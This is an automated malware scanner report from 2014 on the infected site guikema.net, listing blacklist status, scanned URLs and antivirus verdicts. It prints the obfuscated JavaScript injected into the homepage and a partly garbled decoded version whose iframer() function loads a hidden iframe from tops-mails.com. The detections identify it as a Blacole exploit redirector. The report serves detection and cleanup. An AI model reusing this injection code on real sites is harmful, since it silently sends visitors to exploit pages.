New scan:

Malware Scanner report for guikema.net

Malicious/Suspicious/Total urls checked
1/0/17
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "guikema.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=guikema.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://guikema.net/
200 OK
Content-Length: 300408
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var s,q=2,aa=document.createTextNode("harCode");try{a}catch(qq){s=String["fromC"+aa.nodeValue];}
eval(s(7+q,7+q,103+q,100+q,30+q,38+q,98+q,109+q,97+q,115+q,107+q,99+q,108+q,114+q,44+q,101+q,99+q,114+q,67+q,106+q,99+q,107+q,99+q,108+q,114+q,113+q,64+q,119+q,82+q,95+q,101+q,76+q,95+q,107+q,99+q,38+q,37+q,96+q,109+q,98+q,119+q,37+q,39+q,89+q,46+q,91+q,39+q,121+q,7+q,7+q,7+q,103+q,100+q,112+q,95+q,107+q,99+q,112+q,38+q,39+q,57+q,7+q,7+q,123+q,30+q,99+q,106+q,113+q,99+q,30+q,121+q,7+q,7+q,7+q,98
... 2250 bytes are skipped ...
7+q,100+q,44+q,113+q,99+q,114+q,63+q,114+q,114+q,112+q,103+q,96+q,115+q,114+q,99+q,38+q,37+q,102+q,99+q,103+q,101+q,102+q,114+q,37+q,42+q,37+q,47+q,46+q,37+q,39+q,57+q,7+q,7+q,7+q,98+q,109+q,97+q,115+q,107+q,99+q,108+q,114+q,44+q,101+q,99+q,114+q,67+q,106+q,99+q,107+q,99+q,108+q,114+q,113+q,64+q,119+q,82+q,95+q,101+q,76+q,95+q,107+q,99+q,38+q,37+q,96+q,109+q,98+q,119+q,37+q,39+q,89+q,46+q,91+q,44+q,95+q,110+q,110+q,99+q,108+q,98+q,65+q,102+q,103+q,106+q,98+q,38+q,100+q,39+q,57+q,7+q,7+q,123+q));

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
... 10513 bytes are skipped ...
gt;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tops-mails.com/index.html');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://tops-mails.com/index.html' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

AntiVir
JS/iFrame.GJ.2
Avast
JS:Redirector-HL [Trj]
Ad-Aware
Trojan.JS.QGD
Antiy-AVL
Trojan/JS.Iframe
Ikarus
JS.Obfuscated
nProtect
Trojan.JS.QGD
Comodo
Exploit.JS.Blacole.AW
Emsisoft
Trojan.JS.QGD (B)
K7GW
Exploit ( 04c55f4f1 )
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
VirTool:JS/Obfuscator.Z
Kaspersky
Trojan-Downloader.JS.Iframe.chy
MicroWorld-eScan
Trojan.JS.QGD
Fortinet
JS/Agent.GDO!tr.dldr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.cq
NANO-Antivirus
Trojan.Script.DarDuk.duuii
AVG
JS/Obfuscated
Norman
Script.AF
Sophos
Mal/Iframe-W
GData
Trojan.JS.QGD
BitDefender
Trojan.JS.QGD

http://beavermovies.com/redirection/info.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 02:38:21 GMT
Location: http://www.beavermovies.com/redirection/info.js
Server: Apache/2.4.9 (Unix)
Content-Length: 255
Content-Type: text/html; charset=iso-8859-1
clean
http://www.beavermovies.com/redirection/info.js
404 Not Found
Content-Length: 28828
Content-Type: text/html
clean
http://www.beavermovies.com/redirection/docwrite.js
404 Not Found
Content-Length: 28767
Content-Type: text/html
clean
http://ard.xxxblackbook.com/trafficoptimizer/index.php?toid=32948&r=lc218154
200 OK
Content-Length: 708
Content-Type: text/html
clean
http://ard.xxxblackbook.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://beavermovies.com/redirection/pounder-aff.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 02:38:25 GMT
Location: http://www.beavermovies.com/redirection/pounder-aff.js
Server: Apache/2.4.9 (Unix)
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
clean
http://www.beavermovies.com/redirection/pounder-aff.js
404 Not Found
Content-Length: 28767
Content-Type: text/html
clean
http://www.beavermovies.com/redirection/news.php
404 Not Found
Content-Length: 28767
Content-Type: text/html
clean
http://www.beavermovies.com/redirection/contact.php
404 Not Found
Content-Length: 28767
Content-Type: text/html
clean
http://www.beavermovies.com/
200 OK
Content-Length: 28712
Content-Type: text/html
clean
http://www.beavermovies.com/docwrite.js
200 OK
Content-Length: 48
Content-Type: application/javascript
clean
http://www.beavermovies.com/news.php
200 OK
Content-Length: 20348
Content-Type: text/html
clean
http://www.beavermovies.com/contact.php
200 OK
Content-Length: 5695
Content-Type: text/html
clean
http://www.beavermovies.com/?list=last
200 OK
Content-Length: 27687
Content-Type: text/html
clean
http://www.beavermovies.com/?list=top
200 OK
Content-Length: 27611
Content-Type: text/html
clean
http://www.beavermovies.com/?list=fav
200 OK
Content-Length: 27776
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: guikema.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 02:38:19 GMT
Accept-Ranges: bytes
ETag: "18f8a3dc-890b7-7c735600"
Server: Apache/2.0.54 (Fedora)
Content-Length: 561335
Content-Type: text/html
Last-Modified: Wed, 24 Aug 2011 14:54:16 GMT
X-Pad: avoid browser bug

...561335 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: guikema.net
Referer: http://www.google.com/search?q=guikema.net

Result:
The result is similar to the first query. There are no suspicious redirects found.